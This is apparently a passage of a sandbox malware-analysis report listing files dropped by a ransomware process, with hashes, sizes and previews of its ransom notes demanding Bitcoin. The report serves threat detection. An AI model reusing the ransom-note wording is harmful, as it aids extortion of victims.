                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Support\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Support\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Support\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\ActivityLog\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\ActivityLog\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\ActivityLog\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
